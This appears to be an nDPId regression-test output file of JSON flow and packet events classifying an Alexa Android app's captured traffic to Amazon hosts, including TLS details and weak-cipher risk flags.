{"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":403,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1490976043873,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976043873,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwUbtAAOcGVIdIFc6HrBAq2AG7pJG1BAKQQ3Bp4nASH\/5rUgAAAgQFtAEDAwY="} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":404,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1490976043875,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976043875,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoJo1AAEAGJr6sECrYSBXOh6SRAbtDcGnitQQCkVAQAVe1wwAA"} +00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":405,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976043814,"flow_last_seen":1490976043875,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976043875,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42129,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00912{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":409,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976043814,"flow_last_seen":1490976043941,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1665,"flow_avg_l4_payload_len":237,"midstream":0,"thread_ts_msec":1490976043941,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42129,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01281{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":411,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976043814,"flow_last_seen":1490976043941,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4585,"flow_avg_l4_payload_len":509,"midstream":0,"thread_ts_msec":1490976043941,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42129,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","server_names":"fls-na.amazon.ca,fls-na.amazon.com,fls-na.amazon.com.br,fls-na.amazon.com.mx","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=fls-na.amazon.com","alpn":"h2,http\/1.1","fingerprint":"2F:16:23:0F:F8:49:12:18:49:55:48:DA:E6:59:D9:B3:BB:0E:41:8A"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":424,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976044189,"flow_last_seen":1490976044189,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976044189,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45673,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":424,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1490976044189,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976044189,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8KphAAEAGHFesECrYNF7ohrJpAbvSj2UKAAAAAKAC\/\/8X6wAAAgQFtAQCCAoA9k+SAAAAAAEDAwg="} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":425,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976044219,"flow_last_seen":1490976044219,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976044219,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45674,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1490976044219,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976044219,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8UU1AAEAG9aGsECrYNF7ohrJqAbsS8h7YAAAAAKAC\/\/8dtwAAAgQFtAQCCAoA9k+VAAAAAAEDAwg="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1490976044265,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976044265,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwK9ZAAOcGdCQ0XuiGrBAq2AG7smlcwjrL0o9lC3ASH\/7s8AAAAgQFtAEDAwY="} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":427,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1490976044267,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976044267,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoKplAAEAGHGqsECrYNF7ohrJpAbvSj2ULXMI6zFAQAVc3YgAA"} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":428,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976044189,"flow_last_seen":1490976044269,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976044269,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45673,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":430,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1490976044285,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976044285,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwZ65AAOcGOEw0XuiGrBAq2AG7smoL+FEyEvIe2XASH\/4tIwAAAgQFtAEDAwY="} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":431,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1490976044287,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976044287,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoUU5AAEAG9bSsECrYNF7ohrJqAbsS8h7ZC\/hRM1AQAVd3lAAA"} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":432,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976044219,"flow_last_seen":1490976044288,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976044288,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45674,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":434,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976044189,"flow_last_seen":1490976044331,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976044331,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45673,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":441,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976044219,"flow_last_seen":1490976044404,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976044404,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45674,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":448,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1490976044419,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976044419,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8G7BAAEAGvmmsECrYCsl+8Z0IH5CvoFXQAAAAAKAC\/\/\/UsgAAAgQFtAQCCAoA9k+qAAAAAAEDAwg="} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":451,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976044439,"flow_last_seen":1490976044439,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976044439,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49589,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":451,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1490976044439,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976044439,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8t7dAAEAGjzesECrYNF7ohsG1AFD+AvgcAAAAAKAC\/\/9LawAAAgQFtAQCCAoA9k+rAAAAAAEDAwg="} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":454,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976044488,"flow_last_seen":1490976044488,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976044488,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45676,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":454,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1490976044488,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976044488,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8GDVAAEAGLrqsECrYNF7ohrJsAbtUI1eFAAAAAKAC\/\/+juwAAAgQFtAQCCAoA9k+wAAAAAAEDAwg="} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":458,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976044502,"flow_last_seen":1490976044502,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976044502,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45677,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":458,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1490976044502,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976044502,"pkt":"AMDKkaPvePiC0\/vCCABFAAA807lAAEAGczWsECrYNF7ohrJtAbvCg5wLAAAAAKAC\/\/\/w0QAAAgQFtAQCCAoA9k+yAAAAAAEDAwg="} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":460,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976044509,"flow_last_seen":1490976044509,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976044509,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45678,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":460,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1490976044509,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976044509,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8dBBAAEAG0t6sECrYNF7ohrJuAbv0jjuiAAAAAKAC\/\/8fLwAAAgQFtAQCCAoA9k+yAAAAAAEDAwg="} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":461,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976044521,"flow_last_seen":1490976044521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976044521,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45679,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":461,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1490976044521,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976044521,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8pBJAAEAGotysECrYNF7ohrJvAbuLWOumAAAAAKAC\/\/\/YXQAAAgQFtAQCCAoA9k+0AAAAAAEDAwg="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":462,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1490976044548,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976044548,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwjz9AAOcGELs0XuiGrBAq2ABQwbWwdDtt\/gL4HXASH\/7MNQAAAgQFtAEDAwY="} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":463,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1490976044550,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976044550,"pkt":"AMDKkaPvePiC0\/vCCABFAAAot7hAAEAGj0qsECrYNF7ohsG1AFD+AvgdsHQ7blAQAVcWpwAA"} +01071{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":464,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976044439,"flow_last_seen":1490976044552,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":996,"flow_tot_l4_payload_len":996,"flow_avg_l4_payload_len":249,"midstream":0,"thread_ts_msec":1490976044552,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49589,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"http": {"hostname":"alexa.amazon.com","url":"alexa.amazon.com\/lib\/bootstrap\/img\/glyphicons-halflings.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":466,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1490976044585,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976044585,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw+cBAAOcGpjk0XuiGrBAq2AG7smyRBTVcVCNXhnASH\/5KCwAAAgQFtAEDAwY="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":468,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1490976044585,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976044585,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwOIdAAOcGZ3M0XuiGrBAq2AG7sm0P1nENwoOcDHASH\/7coQAAAgQFtAEDAwY="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":469,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1490976044585,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976044585,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw0BdAAOcGz+I0XuiGrBAq2AG7sm67yvGb9I47o3ASH\/7eewAAAgQFtAEDAwY="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":472,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1490976044585,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976044585,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwIDxAAOcGf740XuiGrBAq2AG7sm+mtiDui1jrp3ASH\/59bgAAAgQFtAEDAwY="} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":473,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1490976044587,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976044587,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoGDZAAEAGLs2sECrYNF7ohrJsAbtUI1eGkQU1XVAQAVeUfAAA"} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":474,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976044488,"flow_last_seen":1490976044587,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976044587,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45676,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":476,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1490976044588,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976044588,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo07pAAEAGc0isECrYNF7ohrJtAbvCg5wMD9ZxDlAQAVcnEwAA"} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":477,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":48,"flow_packet_id":3,"flow_last_seen":1490976044588,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976044588,"pkt":"AMDKkaPvePiC0\/vCCABFAAAodBFAAEAG0vGsECrYNF7ohrJuAbv0jjuju8rxnFAQAVco7QAA"} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":478,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1490976044589,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976044589,"pkt":"AMDKkaPvePiC0\/vCCABFAAAopBNAAEAGou+sECrYNF7ohrJvAbuLWOunprYg71AQAVfH3wAA"} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":479,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976044502,"flow_last_seen":1490976044595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976044595,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45677,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 